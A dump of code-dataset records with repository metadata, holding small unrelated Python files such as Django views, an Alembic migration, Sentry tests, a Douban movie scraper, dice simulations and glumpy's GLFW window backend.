# ],
# "weekly": [
# "metabase_ngse.tasks.weekly"
# ]
# "monthly": [
# "metabase_ngse.tasks.monthly"
# ]
# }
# Testing
# -------
# before_tests = "metabase_ngse.install.before_tests"
# Overriding Methods
# ------------------------------
#
# override_whitelisted_methods = {
# "frappe.desk.doctype.event.event.get_events": "metabase_ngse.event.get_events"
# }
#
# each overriding function accepts a `data` argument;
# generated from the base implementation of the doctype dashboard,
# along with any modifications made in other Frappe apps
# override_doctype_dashboards = {
# "Task": "metabase_ngse.task.get_dashboard_data"
# }
|
[
"Anikets@criscoconsulting.in"
] |
Anikets@criscoconsulting.in
|
8de04f6692ceeecd098e35ffafb2f1c85e4a9be7
|
cae1c6d385be49c48342733d105fe0ef817b4c02
|
/tajna.py
|
e77b4821e9372ac4094130b880fe3aacda51665e
|
[] |
no_license
|
silvikavcak/pyladies
|
f7c61228b5170dfec7537766abbe97f355d5feb9
|
da46798e76dfffdc1c91961b9b6271256ea48b40
|
refs/heads/main
| 2023-03-19T08:03:12.613500
| 2021-03-05T18:44:40
| 2021-03-05T18:44:40
| 344,892,517
| 0
| 0
| null | 2021-03-05T18:44:41
| 2021-03-05T17:59:45
|
Python
|
UTF-8
|
Python
| false
| false
| 308
|
py
|
# Prompt for the password and print the matching message.
heslo = input("Zadaj heslo a poviem ti tajnostku: ")
odpoved = (
    "Ak sa chytis prstom pravej ruky laveho ucha a pri tom poskaces 3x 50 cm vysoko, do zajtra bude na nebi o hviezdicku viac."
    if heslo == "susky-susky"
    else "Tajomstvo velkej Arkany ti je zapovedane ty nehodny smrtelny cervik!"
)
print(odpoved)
|
[
"noreply@github.com"
] |
silvikavcak.noreply@github.com
|
aad8fc74a43007757734b635989c1238c35e75a1
|
da8cc1653f8ed4e553fb908a06a5b59e7113d188
|
/migrations/versions/053be705576c_new_fields_in_user_model.py
|
0a3697dbd131f4c0b4597105e4f10b6f8db52417
|
[] |
no_license
|
isaachulvey/tft-companion-app
|
31a6ae4e768f45c17a635188687079754cc8a876
|
ec80fcd0033315e92db78da8cf7575ecca7ad9a2
|
refs/heads/master
| 2022-10-07T05:04:28.935310
| 2020-04-08T18:58:02
| 2020-04-08T18:58:02
| 249,787,351
| 2
| 0
| null | 2022-09-16T18:21:09
| 2020-03-24T18:31:34
|
Python
|
UTF-8
|
Python
| false
| false
| 792
|
py
|
"""new fields in user model
Revision ID: 053be705576c
Revises: 7546358da6cd
Create Date: 2020-04-07 11:36:58.369264
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '053be705576c'  # identifier of this migration
down_revision = '7546358da6cd'  # parent migration in the chain
branch_labels = None
depends_on = None
def upgrade():
    """Add nullable ``about_me`` (140 chars) and ``last_seen`` columns to ``user``."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column('user', sa.Column('about_me', sa.String(length=140), nullable=True))
    op.add_column('user', sa.Column('last_seen', sa.DateTime(), nullable=True))
    # ### end Alembic commands ###
def downgrade():
    """Revert the migration by dropping the two added ``user`` columns."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('user', 'last_seen')
    op.drop_column('user', 'about_me')
    # ### end Alembic commands ###
|
[
"isaachulvey@gmail.com"
] |
isaachulvey@gmail.com
|
775b26f16fa53c27ec712bf92cfb31553c92f19d
|
e24511af0fdf299130fdf1e27b7eda1e35064e7c
|
/app/coupon/apps.py
|
bab96066b77b4592b0cf454c6ef51fa085d53a67
|
[] |
no_license
|
amitbhalla/lms
|
623dc6764dba5ee67a7f30d3882b7917b6441c2e
|
0810a875008b371a7bd3996742ad3b04ce037b14
|
refs/heads/main
| 2023-07-19T12:12:40.570958
| 2021-09-17T16:55:29
| 2021-09-17T16:55:29
| 405,055,595
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 144
|
py
|
from django.apps import AppConfig
class CouponConfig(AppConfig):
    """Django application configuration for the ``coupon`` app."""

    # 64-bit auto-incrementing primary keys by default.
    default_auto_field = "django.db.models.BigAutoField"
    name = "coupon"
|
[
"amit9815@gmail.com"
] |
amit9815@gmail.com
|
a2a16481c7b8f3bafa0f35b577b432e7fc6f2adc
|
b4272e8a7863c27644f104c42e1d99c6cd02d8a7
|
/15_printing_CL_arguments.py
|
5e066b025df1f3293dfcde3c98a25165554d2580
|
[] |
no_license
|
skanda9927/year2020
|
613856b7cfa3405f268d930fc4cbdd9897b5709e
|
3745e1caadb4051399505d2cc9e642a930a0c088
|
refs/heads/master
| 2020-12-22T04:15:44.428379
| 2020-01-28T05:50:43
| 2020-01-28T05:50:43
| 236,667,507
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 728
|
py
|
# 15. Command line arguments to python: print count, list them, print the last argument value
# PSEUDOCODE
# Step 1 : import the module named sys
# Step 2 : read the arguments from the built-in list sys.argv
# Step 3 : print how many arguments were supplied (len of the list)
# Step 4 : print every argument, then the value of the last one
import sys

# Command line arguments are stored in the form of a list in sys.argv;
# sys.argv[0] is the script path itself, so the list is never empty.
argumentList = sys.argv

# Print the count of arguments (the original script omitted this despite
# the stated requirement above).
print(len(argumentList))

# List every argument — idiomatic iteration instead of range(len(...)).
for argument in argumentList:
    print(argument)

# Print the last argument's value (also required but missing originally).
print(argumentList[-1])
|
[
"noreply@github.com"
] |
skanda9927.noreply@github.com
|
d09ebfb916301f9570de15677478373cadbd685a
|
9db18bcc847ffdff8ca1aa8fe2470bdd1d17f609
|
/LAB1/generate_similar_event.py
|
32b83c22ea6385ae25638088ea0d280d905273fa
|
[] |
no_license
|
ShangGaoG/CVLAB
|
4397c125ec412329aa45af705465aae73b2f1d16
|
b9f1c24ba35a7af56f556a63796798bd4e8cc234
|
refs/heads/master
| 2023-03-25T15:48:07.566625
| 2020-12-09T00:49:54
| 2020-12-09T00:49:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,482
|
py
|
from utils.misc import *
import pandas as pd
from sklearn.metrics.pairwise import cosine_similarity
from matplotlib import pyplot as plt
import sys
import numpy as np
def generate_similar_events(query_path,gallery_path):
    """For every query incident, find its 5 most similar gallery incidents.

    Reads incident vectors from the two JSON files, ranks gallery entries by
    cosine similarity for each query vector, and writes the result to
    ``similar_event.csv`` and ``similar_event.json``.
    """
    gallery_df = pd.read_json(gallery_path)
    gallery_ids = np.array(list(gallery_df['gallery_id']))
    gallery_vecs = np.array(list(gallery_df['gallery_incident']), dtype=float)
    query_df = pd.read_json(query_path)
    query_ids = list(query_df['query_id'])
    query_vecs = np.array(list(query_df['query_incident']), dtype=float)
    similar_events = []
    for vec in query_vecs:
        # Cosine similarity of this query vector against the whole gallery.
        scores = cosine_similarity([vec], gallery_vecs).flatten()
        # Gallery indices ordered from most to least similar.
        ranked = np.argsort(scores)[::-1]
        similar_events.append(gallery_ids[list(ranked[0:5])])
    out = pd.DataFrame({'query event':query_ids,'similar events':similar_events})
    out.to_csv('similar_event.csv')
    out.to_json('similar_event.json')
# Hard-coded input paths for this experiment run.
query_path = '/home/xiaoxiaoyu/codes/imgs_cls/query_incident.json'
gallery_path = '/home/xiaoxiaoyu/codes/imgs_cls/gallery_incident.json'
generate_similar_events(query_path,gallery_path)
|
[
"11711603@mail.sustech.edu.cn"
] |
11711603@mail.sustech.edu.cn
|
209cf4447eef471a6961ceff4174497f1acc3937
|
caa947ea6cbbb44c80f01702a4076708451eaa73
|
/splider_for_douban.py
|
3c00e458a309669504c1bf16436621e9837d16df
|
[] |
no_license
|
lugq1990/chatbot_douban
|
e2696aa56657fda3d4afdc6775390db691df3e9b
|
f7d746dfcdd5ea853e99ad96c7dfe7cebc4b31e8
|
refs/heads/main
| 2023-08-27T01:36:55.246079
| 2021-10-25T07:21:17
| 2021-10-25T07:21:17
| 418,353,579
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,285
|
py
|
import re
from bs4 import BeautifulSoup
import requests
import time
import os
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
import json
class DoubanSplider:
    """Scraper for douban.com's Top-250 movie chart."""

    def __init__(self) -> None:
        # Page template: ``start`` is the 0-based offset of the first entry.
        self.base_top_url = "https://movie.douban.com/top250?start={}&filter="
        self.headers = {'User-Agent': 'Mozilla/5.0'}
        # Selenium-driven Chrome, installed on demand.
        self.driver = webdriver.Chrome(ChromeDriverManager().install())

    def get_response(self, url):
        """Fetch *url* with requests and return a parsed BeautifulSoup tree."""
        resp = requests.get(url, headers=self.headers)
        if resp.status_code != 200:
            print("Get some error from request! As error code is {}".format(resp.status_code))
        soup = BeautifulSoup(resp.content, 'html.parser')
        time.sleep(.2)  # small delay between requests
        return soup

    def get_response_with_driver(self, url):
        """Load *url* in the Selenium browser and return the parsed page."""
        self.driver.get(url)
        soup = BeautifulSoup(self.driver.page_source, 'html.parser')
        time.sleep(.1)
        return soup

    def get_top250_links(self):
        """Walk all chart pages; collect (title, score, users, url) tuples."""
        per_page, total = 25, 250
        collected = []
        for page in range(int(total / per_page)):
            print("Now if page: {}".format(page))
            soup = self.get_response_with_driver(self.base_top_url.format(page * per_page))
            # Every movie entry on the page lives in a <div class="item">.
            for entry in soup.find_all('div', class_='item'):
                collected.append(self._get_top_content(entry))
        return collected

    @staticmethod
    def save_list_into_file(obj_list, file_name, file_path=None):
        """Write one item per line; list/tuple items are comma-joined."""
        file_path = file_path or 'tmp_data'
        if '.' not in file_name:
            file_name += '.txt'
        with open(os.path.join(file_path, file_name), 'w', encoding='utf-8') as out:
            for entry in obj_list:
                line = ','.join(entry) if isinstance(entry, (list, tuple)) else entry
                out.write(line + '\n')

    @staticmethod
    def _get_top_content(item):
        """Extract (title, score, rating-count, detail-url) from one entry."""
        hd = item.find(class_='hd')
        title = hd.find(class_='title').get_text()
        url = hd.find('a').get('href')
        score = item.find_all("span", class_='rating_num')[0].get_text()
        n_users = item.find_all("span")[-2].get_text()
        return (title, score, n_users, url)

    def get_movie_base_info(self):
        """Fetch sample metadata for each saved movie via an open API,
        keyed by movie name. Movie ids come from the saved link file."""
        base_api_url = "https://movie.querydata.org/api?id={}"
        # The id is the second-to-last path segment of each saved link.
        with open(os.path.join('tmp_data', 'top250_link.txt'), 'r', encoding='utf-8') as f:
            lines = f.readlines()
        movie_info_dict = {}
        for line in lines:
            fields = line.split(',')
            movie_id = fields[-1].split("/")[-2]
            movie_info_dict[fields[0]] = requests.get(base_api_url.format(movie_id)).text
        return movie_info_dict
# Script entry point: scrape the chart and persist the collected links
# (save_list_into_file defaults to the tmp_data directory).
if __name__ == '__main__':
    splider = DoubanSplider()
    res_link = splider.get_top250_links()
    splider.save_list_into_file(res_link, 'top250_link.txt')
|
[
"guangqiang.lu@accenture.com"
] |
guangqiang.lu@accenture.com
|
583cccb8c6a66535f378859ee3db2a6dccf5f457
|
c3f3ce2557682a53199a5ff6e8faf988dfa395fa
|
/1 - Introduccion/ejercicio2.py
|
919c9eb7a908c3eb0d7afde5f95470d814441e24
|
[
"MIT"
] |
permissive
|
yang-itimec/Python-basics
|
b6a19cb94882fac917245ec9af2f3eca2bbc25d5
|
52fbe2019619d760d393dbfed96bbd823b9ba698
|
refs/heads/master
| 2020-04-10T17:44:27.691443
| 2018-12-14T14:47:57
| 2018-12-14T14:47:57
| 161,182,531
| 0
| 0
| null | 2018-12-11T15:44:54
| 2018-12-10T13:52:58
|
Python
|
UTF-8
|
Python
| false
| false
| 954
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 10 16:51:53 2018
@author: PENG YANG YANG
"""

########################
# TEMA 1 - EJERCICIO 2 #
########################
'''
Ejercicios mutaciones, alias y clonaciones
1- Crear una lista con los meses del año (lista1).
2- Crear un alias de la lista (lista2).
3- Clonar la lista (lista3).
4- Añadir a la lista1 “Fin de Año”
5- Mostrar la lista2 y la lista3.
'''

# NOTE: `%reset -f` is an IPython magic (clears the namespace); this file is
# meant to be run cell-by-cell in an IPython/Spyder session, not as a script.
%reset -f

#%% 1- Create a list with the months of the year (lista1).
lista1 = ['Enero','Febrero','Marzo','Abril','Mayo','Junio','Julio','Agosto',
          'Septiembre','Octubre','Noviembre','Diciembre']
lista1

#%% 2- Create an alias of the list (lista2): both names refer to one object.
lista2 = lista1
lista2

#%% 3- Clone the list (lista3): the slice copy is independent of lista1.
lista3 = lista1[:]
lista3

#%% 4- Append "Fin de Año" to lista1 (the alias sees it; the clone does not).
lista1.append('Fin de Año')
lista1

#%% 5- Show lista2 and lista3.
print(lista2)
print(lista3)
|
[
"noreply@github.com"
] |
yang-itimec.noreply@github.com
|
4b3a9d826820ca989271e40c1f7f39529da12284
|
abe2b440071962ad1f0eaaf34ddfcccafba4b5f8
|
/15_descriptions.py
|
604ea6aea2f8b79fb547797d407d4684c46be0b4
|
[] |
no_license
|
shauseth/converting-bdb-to-48hd
|
f097e253648c9e8d49b539548cb58d5adfb1cb87
|
0c4daba99247d366b0da58b021e8d6a9ec78ae2e
|
refs/heads/master
| 2020-05-18T02:29:28.604783
| 2019-05-21T18:22:05
| 2019-05-21T18:22:05
| 184,116,399
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 671
|
py
|
# SH-I
# Pair every sequence file in the working directory with the mimotope-set id
# encoded in its filename, then attach the sequences to the CSV table.

import pandas as pd
import os

data = pd.read_csv('second-generation-2.csv')

id_list = []
seq_list = []

for filename in os.listdir('.'):
    if filename == 'desc.py':
        pass
    elif filename == 'second-generation-2.csv':
        pass
    else:
        # get IDs: everything before the first underscore is the set id.
        set_id = filename.split('_')[0]
        id_list.append(int(set_id))
        # get sequences -- context manager guarantees the handle is closed
        # (the original leaked handles via explicit open/close on error).
        with open(filename, 'r') as handle:
            seq_list.append(handle.read())

# Renamed from `dict`/`id` to avoid shadowing the builtins.
id_to_seq = dict(zip(id_list, seq_list))
data['Sequences'] = data['MimotopeSetID'].map(id_to_seq)

print(data)
data.to_csv('second-generation-3.csv', index = False)
|
[
"noreply@github.com"
] |
shauseth.noreply@github.com
|
12b66e27cea728950994f9107bed6a3ac88c37e0
|
977fcb9a15da52340dab332f7668dde57317f9f3
|
/tests/sentry/mediators/sentry_app_installations/test_creator.py
|
501aa0dfe71cb01db55eb1eb8186413f1a00b25c
|
[
"BSD-2-Clause"
] |
permissive
|
conan25216/sentry
|
8649761d4cbd2ff7ec21b1ac171f0997da2e692f
|
fe38ab19fb096688140b2065da0e45fa26762200
|
refs/heads/master
| 2020-04-09T12:37:20.846884
| 2018-12-04T12:20:26
| 2018-12-04T12:20:26
| 160,357,556
| 1
| 0
|
BSD-3-Clause
| 2018-12-04T12:56:51
| 2018-12-04T12:56:50
| null |
UTF-8
|
Python
| false
| false
| 1,566
|
py
|
from __future__ import absolute_import
from mock import patch
from sentry.mediators.sentry_app_installations import Creator
from sentry.models import ApiAuthorization
from sentry.testutils import TestCase
class TestCreator(TestCase):
    """Tests for the SentryAppInstallation ``Creator`` mediator."""

    def setUp(self):
        # A sentry app owned by `self.org` with a single scope, plus a
        # Creator pointed at it by slug.
        self.user = self.create_user()
        self.org = self.create_organization()

        self.sentry_app = self.create_sentry_app(
            name='nulldb',
            organization=self.org,
            scopes=('project:read',),
        )

        self.creator = Creator(
            organization=self.org,
            slug='nulldb',
            user=self.user,
        )

    def test_creates_api_authorization(self):
        # Installing grants the app's proxy user an ApiAuthorization
        # carrying the app's scopes.
        install, grant = self.creator.call()

        assert ApiAuthorization.objects.get(
            application=self.sentry_app.application,
            user=self.sentry_app.proxy_user,
            scopes=self.sentry_app.scopes,
        )

    def test_creates_installation(self):
        install, grant = self.creator.call()
        assert install.pk

    def test_creates_api_grant(self):
        install, grant = self.creator.call()
        assert grant.pk

    @patch('sentry.tasks.app_platform.installation_webhook.delay')
    def test_notifies_service(self, installation_webhook):
        # The installation webhook task must be queued exactly once.
        install, _ = self.creator.call()
        installation_webhook.assert_called_once_with(install.id, self.user.id)

    def test_associations(self):
        # The installation links back to both the grant and an authorization.
        install, grant = self.creator.call()

        assert install.api_grant == grant
        assert install.authorization is not None
|
[
"noreply@github.com"
] |
conan25216.noreply@github.com
|
38a81091e93b14ef1136031dcd8071060b60dc35
|
1ff6cd4b1114b530a0f2918f6d2193b2ce270bcf
|
/Week-2/Day_4/die_roll.py
|
6d39b06fc9f5660daad7d8d3199b080ad48932b8
|
[] |
no_license
|
Ace238/python-bootcamp
|
e8fac460488701eff6453bd81ddab8eb4059a2aa
|
adea58b8f9b87a52338181f677f01d6cbc802046
|
refs/heads/master
| 2020-12-05T15:08:58.366028
| 2020-01-16T05:22:02
| 2020-01-16T05:22:02
| 232,150,937
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,582
|
py
|
import random
def roll_die(dice_max=6):
    """
    Return a single die roll: a random integer between 1 and ``dice_max``
    inclusive.

    ``dice_max`` now defaults to 6 (a standard die).  The original
    signature required the argument, which broke callers such as
    ``monte_carlo`` that invoke ``roll_die()`` with no argument; the
    original docstring also wrongly claimed a fixed 1..6 range.
    """
    return random.randint(1, dice_max)
def monte_carlo(n):
    """
    Perform a monte carlo simulation of ``n`` rolls of a six-sided die and
    print the observed frequency of each face.

    [PARAM]   n (int) - number of samples
    [RETURN]  None - prints out the results of the simulation
    """
    # counts[k] = how many times face k came up (index 0 is unused).
    counts = [0] * 7
    for _ in range(n):
        # BUG FIX: the original called roll_die() with no argument although
        # roll_die required dice_max, raising TypeError on the first roll.
        counts[roll_die(6)] += 1
    print(f"There were {n} simulations performed.")
    # Same output text as the original six near-identical print blocks.
    for face, word in enumerate(('ones', 'twos', 'threes', 'fours', 'fives', 'sixes'), start=1):
        print(f"There were {(counts[face]/n) * 100}% {word}")
# monte_carlo(100000)
def monte_carlo_with_lists(N, dice_max = 6):
    """Roll a ``dice_max``-sided die N times and print each face's share."""
    outcomes = [roll_die(dice_max) for _ in range(N)]
    print(f"{N} experiments performed")
    for face in range(1, dice_max + 1):
        print(f"The probability of {face} = {(outcomes.count(face)/N)*100}%")
# Drive a 10,000-sample simulation of a ten-sided die.
dice_max = 10
monte_carlo_with_lists(10000, dice_max)
|
[
"tmilien000@citymail.cuny.edu"
] |
tmilien000@citymail.cuny.edu
|
84340a119e8fdb72320174077f9aa1c0605ca64f
|
9d566e153a254390ed758f4e945781899b6dcd07
|
/03_django/02_django_crud/articles/views.py
|
e9c78e872870c579df912051bc9513f1f01afb88
|
[] |
no_license
|
baambox5/TIL
|
6f1b0fdc342ed29b85a68404b916fc6f4cace7bf
|
0419779ccbf506a1e89d581b98658dd07b78388c
|
refs/heads/master
| 2023-01-13T01:14:08.125234
| 2020-01-17T14:36:34
| 2020-01-17T14:36:34
| 195,918,108
| 0
| 0
| null | 2023-01-07T11:27:08
| 2019-07-09T02:31:02
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,964
|
py
|
from IPython import embed
from django.core.exceptions import ValidationError
from django.shortcuts import render, redirect
from .models import Article, Comment
# Create your views here.
def index(request):
    """Render the article list, newest first."""
    # articles = Article.objects.all()
    articles = Article.objects.order_by('-pk')  # ordering done by the DB (preferred)
    # articles = Article.objects.all()[::-1]  # ordering done in Python
    context = {'articles': articles,}
    return render(request, 'articles/index.html', context)
def create(request):
    """POST: create an article from the submitted form; GET: show the form."""
    # CREATE
    if request.method == 'POST':
        title = request.POST.get('title')
        content = request.POST.get('content')
        image = request.FILES.get('image')
        # 1
        # article = Article()
        # article.title = title
        # article.content = content
        # article.save()
        # 2
        article = Article(title=title, content=content, image=image)
        article.save()
        # 3
        # Article.objects.create(title=title, content=content)
        return redirect(article)  # to the article's page
        # return redirect('/articles/', article.pk)
    # NEW
    else:
        return render(request, 'articles/create.html')
def detail(request, article_pk):
    """Show one article together with all of its comments."""
    article = Article.objects.get(pk=article_pk)
    ctx = {
        'article': article,
        'comments': article.comment_set.all(),
    }
    return render(request, 'articles/detail.html', ctx)
def delete(request, article_pk):
    """Delete the article on POST; otherwise bounce back to its page."""
    article = Article.objects.get(pk=article_pk)
    if request.method != 'POST':
        return redirect(article)
    article.delete()
    return redirect('articles:index')
def update(request, article_pk):
    """POST: apply edits to the article; GET: show the edit form."""
    article = Article.objects.get(pk=article_pk)
    if request.method == 'POST':
        for field in ('title', 'content'):
            setattr(article, field, request.POST.get(field))
        article.image = request.FILES.get('image')
        article.save()
        return redirect(article)
    return render(request, 'articles/update.html', {'article': article,})
def comments_create(request, article_pk):
    """Attach a new comment to the given article (POST only)."""
    # The article being commented on.
    article = Article.objects.get(pk=article_pk)
    if request.method == 'POST':
        # Comment text submitted from the form.
        content = request.POST.get('content')
        # Create and save the comment.
        comment = Comment(article=article, content=content)
        comment.save()
        return redirect(article)
        # return redirect('articles:detail', article.pk)
        # return redirect('articles:detail' article_pk)
    else:
        return redirect(article)
def comments_delete(request, article_pk, comment_pk):
    """Delete a comment on POST, then go back to the article's detail page."""
    # article = Article.objects.get(pk=article_pk)
    if request.method == 'POST':
        comment = Comment.objects.get(pk=comment_pk)
        comment.delete()
        # return redirect(article)
        # NOTE(review): the return sits inside the POST branch, so non-POST
        # requests fall through with no response -- confirm this is intended.
        return redirect('articles:detail', article_pk)
|
[
"baamboxo@gmail.com"
] |
baamboxo@gmail.com
|
488814efa60cb7ab1632ed5a4b887fa663a17a55
|
3a6235a79585ed60da42ae6bd69d140c80a5ac4a
|
/Week_01/加1.py
|
06b05dff7e9e38a989632355c6b053e0a9ec6136
|
[] |
no_license
|
Jackson026/AlgorithmQIUZHAO
|
dea6c58d972bc5039e392a16676ad1d60398e1a8
|
09feae0783c8d21bf1b9aaad7fa6917f05ff7162
|
refs/heads/master
| 2022-12-16T23:40:42.151486
| 2020-09-02T07:14:21
| 2020-09-02T07:14:21
| 279,640,530
| 1
| 0
| null | 2020-07-14T16:41:36
| 2020-07-14T16:41:35
| null |
UTF-8
|
Python
| false
| false
| 650
|
py
|
# A shortcut is to convert to str, then int, and back, but that is not very
# general, so it is not written up here as a method.
# Instead we work digit by digit from the right: a 9 becomes 0 and the carry
# moves left; any other digit is simply incremented and we stop.
# For an all-nines input such as 999 the carry survives the whole loop, so a
# leading 1 is inserted at the front with .insert(position, value).
def plusOne(self, digits):
    """Add one to a number stored as a list of decimal digits (in place)."""
    if not digits:
        return digits + [1]
    idx = len(digits) - 1
    while idx >= 0:
        if digits[idx] != 9:
            digits[idx] += 1
            break
        digits[idx] = 0
        idx -= 1
    if digits[0] == 0:
        digits.insert(0, 1)
    return digits
|
[
"guozijia26@126.com"
] |
guozijia26@126.com
|
ba5641cad8c7c2185a8bca2d2985f2d0f54439df
|
2a76ca8c01e7abe6ef64d030ecbb65e88641b278
|
/glumpy/app/window/backends/backend_glfw_deprecated.py
|
66413814abff7f25ba48933d91f337089dd6e8fb
|
[] |
permissive
|
glumpy/glumpy
|
18bfc2d76b7a5fc126fbebddf2970d95238fc66b
|
75408635bd46e48ff10939e308a71eafdaff35e8
|
refs/heads/master
| 2023-09-03T11:48:52.087002
| 2023-04-20T15:23:59
| 2023-04-20T15:23:59
| 23,520,171
| 1,228
| 225
|
BSD-3-Clause
| 2023-07-07T07:25:18
| 2014-08-31T18:30:26
|
Python
|
UTF-8
|
Python
| false
| false
| 17,130
|
py
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2009-2016 Nicolas P. Rougier. All rights reserved.
# Distributed under the (new) BSD License.
# -----------------------------------------------------------------------------
"""
`GLFW <http://www.glfw.org>`_ is an Open Source, multi-platform library for
creating windows with OpenGL contexts and receiving input and events. It is
easy to integrate into existing applications and does not lay claim to the main
loop.
**Usage**
.. code:: python
from glumpy import app
app.use("glfw")
window = app.Window()
**Capability**
========================== ======== ======================== ========
Multiple windows ✓ Set GL API ✓
-------------------------- -------- ------------------------ --------
Non-decorated windows ✓ Set GL Profile ✓
-------------------------- -------- ------------------------ --------
Resize windows ✓ Share GL Context ✓
-------------------------- -------- ------------------------ --------
Move windows ✓ Unicode handling ✓
-------------------------- -------- ------------------------ --------
Fullscreen ✓ Scroll event ✓
========================== ======== ======================== ========
"""
import os, sys, platform
from glumpy import gl
from glumpy.log import log
from glumpy.app import configuration
from glumpy.app.window import window
# Backend name
__name__ = "GLFW"
# Backend version (if available)
__version__ = ""
# Backend availability
__availability__ = False
# Whether the framework has been initialized
__initialized__ = False
# Active windows
__windows__ = []
# Windows scheduled to be destroyed
__windows_to_remove__ = []
# ---------------------------------------------------- convenient functions ---
def name(): return __name__            # backend name ("GLFW")
def version(): return __version__      # backend version string ("" if unknown)
def available(): return __availability__  # True when glumpy.ext.glfw imported
# --------------------------------------------------------------- init/exit ---
def __init__():
    """Initialize GLFW once, restoring the working directory afterwards."""
    global __initialized__
    if not __initialized__:
        # glfw might change dir on initialization (feature, not a bug)
        cwd = os.getcwd()
        glfw.glfwInit()
        os.chdir(cwd)
        __initialized__ = True
def __exit__():
    """Terminate GLFW and mark the backend as uninitialized."""
    global __initialized__
    glfw.glfwTerminate()
    __initialized__ = False
# ------------------------------------------------------------ availability ---
try:
    from glumpy.ext import glfw

    __availability__ = True
    __version__ = ("%d.%d.%d") % glfw.version
    __init__()

    # Translate GLFW mouse-button constants to glumpy's window constants.
    __mouse_map__ = { glfw.GLFW_MOUSE_BUTTON_LEFT: window.mouse.LEFT,
                      glfw.GLFW_MOUSE_BUTTON_MIDDLE: window.mouse.MIDDLE,
                      glfw.GLFW_MOUSE_BUTTON_RIGHT: window.mouse.RIGHT }

    # Translate GLFW key constants to glumpy's; printable keys are handled
    # separately in Window._keyboard_translate.
    __key_map__ = { glfw.GLFW_KEY_ESCAPE: window.key.ESCAPE,
                    glfw.GLFW_KEY_ENTER: window.key.ENTER,
                    glfw.GLFW_KEY_TAB: window.key.TAB,
                    glfw.GLFW_KEY_BACKSPACE: window.key.BACKSPACE,
                    glfw.GLFW_KEY_INSERT: window.key.INSERT,
                    glfw.GLFW_KEY_DELETE: window.key.DELETE,
                    glfw.GLFW_KEY_RIGHT: window.key.RIGHT,
                    glfw.GLFW_KEY_LEFT: window.key.LEFT,
                    glfw.GLFW_KEY_DOWN: window.key.DOWN,
                    glfw.GLFW_KEY_UP: window.key.UP,
                    glfw.GLFW_KEY_PAGE_UP: window.key.PAGEUP,
                    glfw.GLFW_KEY_PAGE_DOWN: window.key.PAGEDOWN,
                    glfw.GLFW_KEY_HOME: window.key.HOME,
                    glfw.GLFW_KEY_END: window.key.END,
                    glfw.GLFW_KEY_CAPS_LOCK: window.key.CAPSLOCK,
                    glfw.GLFW_KEY_LEFT_SHIFT: window.key.LSHIFT,
                    glfw.GLFW_KEY_RIGHT_SHIFT: window.key.RSHIFT,
                    glfw.GLFW_KEY_PRINT_SCREEN: window.key.PRINT,
                    glfw.GLFW_KEY_PAUSE: window.key.PAUSE,
                    glfw.GLFW_KEY_F1: window.key.F1,
                    glfw.GLFW_KEY_F2: window.key.F2,
                    glfw.GLFW_KEY_F3: window.key.F3,
                    glfw.GLFW_KEY_F4: window.key.F4,
                    glfw.GLFW_KEY_F5: window.key.F5,
                    glfw.GLFW_KEY_F6: window.key.F6,
                    glfw.GLFW_KEY_F7: window.key.F7,
                    glfw.GLFW_KEY_F8: window.key.F8,
                    glfw.GLFW_KEY_F9: window.key.F9,
                    glfw.GLFW_KEY_F10: window.key.F10,
                    glfw.GLFW_KEY_F11: window.key.F11,
                    glfw.GLFW_KEY_F12: window.key.F12 }

except ImportError:
    # glfw extension missing: report the backend as unavailable.
    __availability__ = False
    __version__ = None
# -------------------------------------------------------------- capability ---
# Feature-support matrix advertised by this backend to glumpy's app layer.
capability = {
    "Window position get/set" : True,
    "Window size get/set"     : True,
    "Multiple windows"        : True,
    "Mouse scroll events"     : True,
    "Non-decorated window"    : True,
    "Non-sizeable window"     : True,
    "Fullscreen mode"         : True,
    "Unicode processing"      : True,
    "Set GL version"          : True,
    "Set GL profile"          : True,
    "Share GL context"        : True,
}
# ------------------------------------------------------- set_configuration ---
def set_configuration(config):
    """ Set gl configuration for GLFW """
    # Let the driver pick the refresh rate.
    glfw.glfwWindowHint( glfw.GLFW_REFRESH_RATE, 0 )
    # Framebuffer channel depths.
    glfw.glfwWindowHint(glfw.GLFW_RED_BITS, config.red_size)
    glfw.glfwWindowHint(glfw.GLFW_GREEN_BITS, config.green_size)
    glfw.glfwWindowHint(glfw.GLFW_BLUE_BITS, config.blue_size)
    glfw.glfwWindowHint(glfw.GLFW_ALPHA_BITS, config.alpha_size)
    # No accumulation buffer.
    glfw.glfwWindowHint(glfw.GLFW_ACCUM_RED_BITS, 0)
    glfw.glfwWindowHint(glfw.GLFW_ACCUM_GREEN_BITS, 0)
    glfw.glfwWindowHint(glfw.GLFW_ACCUM_BLUE_BITS, 0)
    glfw.glfwWindowHint(glfw.GLFW_ACCUM_ALPHA_BITS, 0)
    glfw.glfwWindowHint(glfw.GLFW_DEPTH_BITS, config.depth_size)
    glfw.glfwWindowHint(glfw.GLFW_STENCIL_BITS, config.stencil_size)
    glfw.glfwWindowHint(glfw.GLFW_SRGB_CAPABLE, config.srgb)
    glfw.glfwWindowHint(glfw.GLFW_SAMPLES, config.samples)
    glfw.glfwWindowHint(glfw.GLFW_STEREO, config.stereo)
    # GL API selection: OpenGL ES, or desktop GL with version/profile hints.
    if config.api in ("ES", "es"):
        glfw.glfwWindowHint(glfw.GLFW_CLIENT_API,
                            glfw.GLFW_OPENGL_ES_API)
    else:
        glfw.glfwWindowHint(glfw.GLFW_CONTEXT_VERSION_MAJOR,
                            config.major_version)
        glfw.glfwWindowHint(glfw.GLFW_CONTEXT_VERSION_MINOR,
                            config.minor_version)
        if config.major_version >= 3 and config.profile == "core":
            glfw.glfwWindowHint(glfw.GLFW_OPENGL_PROFILE,
                                glfw.GLFW_OPENGL_CORE_PROFILE)
